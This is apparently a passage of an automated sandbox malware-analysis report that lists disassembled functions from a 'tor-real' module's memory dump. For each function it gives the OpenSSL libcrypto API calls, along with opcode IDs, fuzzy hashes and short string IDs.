                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_assign.LIBCRYPTO-1_1 ref: 6C0BA1F3
                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0BA214
                                                                            • RSA_free.LIBCRYPTO-1_1 ref: 6C0BA49F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: A_freeA_up_refPrivateR_put_errorY_assignY_freeY_newd2i_
                                                                            • String ID: C
                                                                            • API String ID: 2045331235-1037565863
                                                                            • Opcode ID: f26fb0dd28269cf4ba28b64e2a9de7349cdabbc78fc970911634586c04ac683b
                                                                            • Instruction ID: 1d6b95848871531c1cc4228fcc4f5f6096715e3ba2d7d1cc2fb3a77033bb6ac8
                                                                            • Opcode Fuzzy Hash: f26fb0dd28269cf4ba28b64e2a9de7349cdabbc78fc970911634586c04ac683b
                                                                            • Instruction Fuzzy Hash: 055126B45083029FD710DF28C184B9ABBF0BF88308F958D2DE4D99B710DB79E5488B92
                                                                            APIs
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A67BD
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A67C6
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0A67CE
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A68FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_func$O_freeO_newO_s_fileR_put_errorX509_free
                                                                            • String ID: A
                                                                            • API String ID: 635701306-3554254475
                                                                            • Opcode ID: 780d38348b9a3436c8eb2e94349f01cc84d04760e8905f0c80749761107a7485
                                                                            • Instruction ID: 8518b7971c6a7bf643c1e2ca809b895f0f9722a835c813a537cf25f05c4c4666
                                                                            • Opcode Fuzzy Hash: 780d38348b9a3436c8eb2e94349f01cc84d04760e8905f0c80749761107a7485
                                                                            • Instruction Fuzzy Hash: 4B4103B15083059FC710AFA9C484B9EBBF4BF89308F818C1DE598A7700D774E5498F96
                                                                            APIs
                                                                            • EVP_sha256.LIBCRYPTO-1_1 ref: 6C0A278F
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2B8D
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2BA9
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2BBE
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2BE3
                                                                            • OPENSSL_sk_new_reserve.LIBCRYPTO-1_1 ref: 6C0A2C00
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2C1F
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2C67
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2C80
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_num$L_sk_push$L_sk_new_reserveP_sha256
                                                                            • String ID:
                                                                            • API String ID: 2750470393-0
                                                                            • Opcode ID: d310160ff2441a509d45625bf035cdfcb105de9887ea23c8cb35cf890ae6f84b
                                                                            • Instruction ID: 355e6af070c78c0c9e692031911c00e8c32f81c3d08430ebe845ad7b59fb6dc2
                                                                            • Opcode Fuzzy Hash: d310160ff2441a509d45625bf035cdfcb105de9887ea23c8cb35cf890ae6f84b
                                                                            • Instruction Fuzzy Hash: 8ED15C7060A3058FD354DFE6C18875ABBE0BF88708F55497DE8988BB12D774E986CB42
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B6454
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B6473
                                                                            • CT_POLICY_EVAL_CTX_new.LIBCRYPTO-1_1 ref: 6C0B6495
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0B64B5
                                                                            • CT_POLICY_EVAL_CTX_set1_cert.LIBCRYPTO-1_1 ref: 6C0B64C3
                                                                            • CT_POLICY_EVAL_CTX_set1_issuer.LIBCRYPTO-1_1 ref: 6C0B64CF
                                                                            • CT_POLICY_EVAL_CTX_set_shared_CTLOG_STORE.LIBCRYPTO-1_1 ref: 6C0B64E7
                                                                            • CT_POLICY_EVAL_CTX_set_time.LIBCRYPTO-1_1 ref: 6C0B650E
                                                                            • SCT_LIST_validate.LIBCRYPTO-1_1 ref: 6C0B6524
                                                                            • CT_POLICY_EVAL_CTX_free.LIBCRYPTO-1_1 ref: 6C0B657F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_num$L_sk_valueT_validateX_freeX_newX_set1_certX_set1_issuerX_set_shared_X_set_time
                                                                            • String ID: A$P
                                                                            • API String ID: 866506662-345673399
                                                                            • Opcode ID: 46363b3dfb7cb50b780239a6c2ed8fa9c79d4e78301ff71a3435b6963b6036eb
                                                                            • Instruction ID: f1432a9e34abbd6c63a7a1765b3d0a987d9bb6c799de26f675d3cdf57275e2d8
                                                                            • Opcode Fuzzy Hash: 46363b3dfb7cb50b780239a6c2ed8fa9c79d4e78301ff71a3435b6963b6036eb
                                                                            • Instruction Fuzzy Hash: 5E5159B06087018FD700DF24C58439EBBE4AF89758F508D2EE888EBB45DB76E4448B92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: f903c7c891cca04a7a71cc352f1dc2a18da0be7862d0db058c5e5c305ccba88d
                                                                            • Instruction ID: 078b0cca7f1146ca5c612dbb75462ceaccc0dead9a111d77bffd186e6ee5e9db
                                                                            • Opcode Fuzzy Hash: f903c7c891cca04a7a71cc352f1dc2a18da0be7862d0db058c5e5c305ccba88d
                                                                            • Instruction Fuzzy Hash: FAD120B06093019FD320DF25C5847AEBBE1BB89748F608A2DE4989B740E775E548CF93
                                                                            APIs
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0BA6CA
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0BA6D2
                                                                            • BIO_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA6FC
                                                                            • d2i_PrivateKey_bio.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA722
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA74C
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA781
                                                                            • BIO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA789
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA7C9
                                                                            • PEM_read_bio_PrivateKey.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA7F1
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA831
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$Private$Key_bioM_read_bio_O_ctrlO_freeO_newO_s_fileY_freed2i_
                                                                            • String ID: l$|
                                                                            • API String ID: 2673981590-383203303
                                                                            • Opcode ID: 423f8f54605c3bfcea4e681cf9d4555e69e58312a93ea17871381273b6aa2d71
                                                                            • Instruction ID: c98e287ce478248a74801a9ba9c29c5ba68ccea9a7bfd71c36c5fc76527b4211
                                                                            • Opcode Fuzzy Hash: 423f8f54605c3bfcea4e681cf9d4555e69e58312a93ea17871381273b6aa2d71
                                                                            • Instruction Fuzzy Hash: BD31E7B554D305AFD300EF69C44875FBBE0AF88348F11891DE4D89BB50D7B9D9448B86
                                                                            APIs
                                                                            • ENGINE_load_ssl_client_cert.LIBCRYPTO-1_1 ref: 6C0D0868
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0D08B2
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D08BE
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0D0A39
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D0A45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_freeY_free$E_load_ssl_client_cert
                                                                            • String ID: )$D$P
                                                                            • API String ID: 3987155115-3367180111
                                                                            • Opcode ID: b6f4319aef523b2b3e135b1643ccedfac460afcc46bacd8df82209384ba329cf
                                                                            • Instruction ID: 92e8cbb31ab4150a2ee5d6aeda3e65ef0b127d70cd0cff4bd2ba5e9e0a4a275d
                                                                            • Opcode Fuzzy Hash: b6f4319aef523b2b3e135b1643ccedfac460afcc46bacd8df82209384ba329cf
                                                                            • Instruction Fuzzy Hash: 6FB125B060D3418FD7009F29C58475EBBE0AF8931CF52896DE8989B751D775E9488F82
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B8518
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8627
                                                                              • Part of subcall function 6C0A7170: EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0A717A
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B855E
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8563
                                                                            • X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B857A
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B8591
                                                                            • X509_up_ref.LIBCRYPTO-1_1 ref: 6C0B8599
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0B8633
                                                                            • EC_KEY_can_sign.LIBCRYPTO-1_1 ref: 6C0B863B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8677
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$R_clear_errorX509_check_private_keyX509_freeX509_get0_pubkeyX509_up_refY_can_signY_copy_parametersY_get0_Y_id
                                                                            • String ID:
                                                                            • API String ID: 2049276590-0
                                                                            • Opcode ID: 0d19b418c7b5d03d654ea0807f8acda27fe57c74a1a7e176193c495b0f0eb653
                                                                            • Instruction ID: 38a3294eba1b708cbf89181edd8167fba76a21072fe5d7e7623d3e3ce4cedcb5
                                                                            • Opcode Fuzzy Hash: 0d19b418c7b5d03d654ea0807f8acda27fe57c74a1a7e176193c495b0f0eb653
                                                                            • Instruction Fuzzy Hash: B9414AB05083469FD710DF28C480BAEBBF4AF88308F81891DE4949B760EB35E549CB92
                                                                            APIs
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A8744
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A8784
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_dupL_sk_freeL_sk_num$L_sk_set_cmp_funcL_sk_sort
                                                                            • String ID:
                                                                            • API String ID: 2546459316-0
                                                                            • Opcode ID: 2bdf3c0b41e0ad0810182e477dbbae690a0683f1dfb988892a5f35defb13bd54
                                                                            • Instruction ID: 7143489c9f7a525c73df1287795360890cdf3f7fd14814cbbdc71dc1bf71c232
                                                                            • Opcode Fuzzy Hash: 2bdf3c0b41e0ad0810182e477dbbae690a0683f1dfb988892a5f35defb13bd54
                                                                            • Instruction Fuzzy Hash: B2213CB09487418FD300BFA5D48036EBBF5EF8C258F61492EE5888B702E734E5858F92
                                                                            APIs
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09AE17
                                                                            • EVP_CIPHER_CTX_block_size.LIBCRYPTO-1_1 ref: 6C09AE3C
                                                                            • EVP_Cipher.LIBCRYPTO-1_1(?), ref: 6C09AE8F
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1(?), ref: 6C09AEA9
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1(?), ref: 6C09AEC3
                                                                            • EVP_MD_size.LIBCRYPTO-1_1(?), ref: 6C09AECB
                                                                            • memmove.MSVCRT ref: 6C09AF2A
                                                                            • memset.MSVCRT ref: 6C09AF6F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_md$CipherD_sizeX_block_sizeX_ciphermemmovememset
                                                                            • String ID: D$P
                                                                            • API String ID: 261467796-307317852
                                                                            • Opcode ID: 646489b420c8878dd8f69d59a39c316a2b55ed86d8c758dff7a66a8675bd42a7
                                                                            • Instruction ID: 5520b9c9be1c557a5b7d537dd0342b9e10b6a8cc515a30f7a5ac504b56dd4c43
                                                                            • Opcode Fuzzy Hash: 646489b420c8878dd8f69d59a39c316a2b55ed86d8c758dff7a66a8675bd42a7
                                                                            • Instruction Fuzzy Hash: 15519C71A093508FD704CF69C48471BBBE1AF88318F29896DEC98CBB45D774E8859B92
                                                                            APIs
                                                                            • ASYNC_get_current_job.LIBCRYPTO-1_1 ref: 6C0B08A8
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0900
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0933
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$C_get_current_job
                                                                            • String ID: x
                                                                            • API String ID: 2484768174-2363233923
                                                                            • Opcode ID: bb4315d45bf5fdd479740e90f117116cbdd1f5fba4d46ae927c92d74e6e756cb
                                                                            • Instruction ID: 046a55bc513c91bb91550889a46583214119a32d40c70bbb5a27b586fe61d450
                                                                            • Opcode Fuzzy Hash: bb4315d45bf5fdd479740e90f117116cbdd1f5fba4d46ae927c92d74e6e756cb
                                                                            • Instruction Fuzzy Hash: 6051F4B050C3469FE700DF64C58478ABBE0BF85358F508D1CE8D89B791E7B9E5888B96
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 6C0A6973
                                                                            • strlen.MSVCRT ref: 6C0A697D
                                                                            • BIO_snprintf.LIBCRYPTO-1_1 ref: 6C0A69AC
                                                                              • Part of subcall function 6C0A6790: OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A67BD
                                                                              • Part of subcall function 6C0A6790: BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A67C6
                                                                              • Part of subcall function 6C0A6790: BIO_new.LIBCRYPTO-1_1 ref: 6C0A67CE
                                                                            • OPENSSL_DIR_read.LIBCRYPTO-1_1 ref: 6C0A69E2
                                                                            • _errno.MSVCRT ref: 6C0A69ED
                                                                            • GetLastError.KERNEL32 ref: 6C0A6A02
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6A2B
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C0A6A4B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6A77
                                                                            • OPENSSL_DIR_end.LIBCRYPTO-1_1 ref: 6C0A6A91
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6ADF
                                                                            Similarity
                                                                            • API ID: R_put_error$strlen$ErrorL_sk_set_cmp_funcLastO_newO_s_fileO_snprintfR_add_error_dataR_endR_read_errno
                                                                            • String ID:
                                                                            • API String ID: 526503982-0
                                                                            • Opcode ID: 12f5b731e229d490811ae228e3917c6779678807e2ef9b464888aa282121048b
                                                                            • Instruction ID: c9ee444c96a788cc15cfd217ede15ecbc624eb1d3e76d0174dd6b757b94ff032
                                                                            • Opcode Fuzzy Hash: 12f5b731e229d490811ae228e3917c6779678807e2ef9b464888aa282121048b
                                                                            • Instruction Fuzzy Hash: 7E3114B15093019FD3009FA9C08475EBBF0BF84748F818C2DE8A897751D775E58A8F86
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DD7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DE7
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6DF6
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0A6DFE
                                                                            • OPENSSL_sk_pop.LIBCRYPTO-1_1 ref: 6C0A6E13
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6E1B
                                                                            Similarity
                                                                            • API ID: L_sk_num$X509_$E_freeL_sk_popL_sk_pop_freeL_sk_valueX509_freeX509_get_extension_flagsX_free
                                                                            • String ID:
                                                                            • API String ID: 2994630309-0
                                                                            • Opcode ID: e9661599e5b1f01fbca3e6e62f6d63a9a9951631d64f1ca774a8f6501bdc4c96
                                                                            • Instruction ID: 32ac4cc38e2f1741d6679f87c07f8cc8c384aabc963170df4708ee9b97b33953
                                                                            • Opcode Fuzzy Hash: e9661599e5b1f01fbca3e6e62f6d63a9a9951631d64f1ca774a8f6501bdc4c96
                                                                            • Instruction Fuzzy Hash: F121C7719497109FC700AFA8818435EFBF0AF88754F92492DE8D49BB12D774E8868F82
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$D
                                                                            • API String ID: 0-1275706592
                                                                            • Opcode ID: f7d130f6b281e598e927100837d897dd989905fcbdedb9dfd3713f0c1262476f
                                                                            • Instruction ID: 5764d7df9af8e647294641e7dd129434c93ad5531017ac4115d62f65bdf61618
                                                                            • Opcode Fuzzy Hash: f7d130f6b281e598e927100837d897dd989905fcbdedb9dfd3713f0c1262476f
                                                                            • Instruction Fuzzy Hash: E8E1BF306893098FC714DF24D08076AB7E1FF88318F158A6DDAA4DBB91DB30E945CB91
                                                                            APIs
                                                                            • ASYNC_start_job.LIBCRYPTO-1_1 ref: 6C0ACF0A
                                                                            • ASYNC_WAIT_CTX_new.LIBCRYPTO-1_1 ref: 6C0ACF70
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0ACFCE
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AD00E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: R_put_error$C_start_jobX_new
                                                                            • String ID: D
                                                                            • API String ID: 806409594-2746444292
                                                                            • Opcode ID: 4b9c36b140ac7dc06b9ed49fbc0641dd4239f41f03f0944988dc227317ce6372
                                                                            • Instruction ID: 38da5683abe264b79ceeae28f1202e044e42c58fd40a4406c4d3795e8b66c1a3
                                                                            • Opcode Fuzzy Hash: 4b9c36b140ac7dc06b9ed49fbc0641dd4239f41f03f0944988dc227317ce6372
                                                                            • Instruction Fuzzy Hash: DA4180B15083018FC710DFA9C48078BBBF0BF89358F518A1DE8A89B791D775E54ACB92
                                                                            APIs
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D8706
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: L_sk_numO_zalloc
                                                                            • String ID: 9$D$P
                                                                            • API String ID: 485224183-1575434384
                                                                            • Opcode ID: d047e64463945d8ea1ff1fec6829dfdcc1f897e80936eb91d49ddfaaf4a05ae3
                                                                            • Instruction ID: 604c09507e892f129e971337ea5ae2273c718d49a09cec1ea3e4462638b4faf4
                                                                            • Opcode Fuzzy Hash: d047e64463945d8ea1ff1fec6829dfdcc1f897e80936eb91d49ddfaaf4a05ae3
                                                                            • Instruction Fuzzy Hash: B2410FB06093019FD700DF25C58434EBBF0AB88798F519A2EE89897700E774EA489F93
                                                                            APIs
                                                                            • X509_VERIFY_PARAM_set1_host.LIBCRYPTO-1_1 ref: 6C0B0F0C
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B0F3E
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0F87
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0FBF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B102F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B1067
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: R_put_error$L_sk_new_nullM_set1_hostX509_
                                                                            • String ID: 7$A
                                                                            • API String ID: 3990112349-777435815
                                                                            • Opcode ID: 2f6f0a512f93ee50a010cd006697f2ab0a01081b8ce79b198b1c93198d7a25a0
                                                                            • Instruction ID: 9030e044bea3c7cd97b10309917dcb37575d6c0f263aebe977bc6ceb463644d3
                                                                            • Opcode Fuzzy Hash: 2f6f0a512f93ee50a010cd006697f2ab0a01081b8ce79b198b1c93198d7a25a0
                                                                            • Instruction Fuzzy Hash: 093139F06093469FE700CF64C58438A7BE0BB8531CF248A2CE9A89F791D7B9D5489B56
                                                                            APIs
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A661B
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6633
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6641
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0A6653
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6665
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6670
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A66A2
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A66B3
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A66C5
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A66CD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A66D9
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A66E1
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A6785
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: X509_$E_free$E_dupH_freeH_retrieveL_sk_new_nullL_sk_pop_freeM_read_bio_O_freeR_put_errorX509X509_freeX509_get_subject_name__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 3354858419-3554254475
                                                                            • Opcode ID: 70f218dc80dc8bfd560ba444971f34240f2d7bce8b76906e8358a1c0ae3f4b5a
                                                                            • Instruction ID: 148e5b8301fe98c5085d8c59d965434a20567912c6c7958aece3c5966b25a72d
                                                                            • Opcode Fuzzy Hash: 70f218dc80dc8bfd560ba444971f34240f2d7bce8b76906e8358a1c0ae3f4b5a
                                                                            • Instruction Fuzzy Hash: 0201F6B1648701CFD300AFA5C48039EFBF0BF49358F52882CD5D8ABB11D779A94A8B46
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A8763
                                                                            • OPENSSL_sk_delete.LIBCRYPTO-1_1 ref: 6C0A877C
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A8784
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Similarity
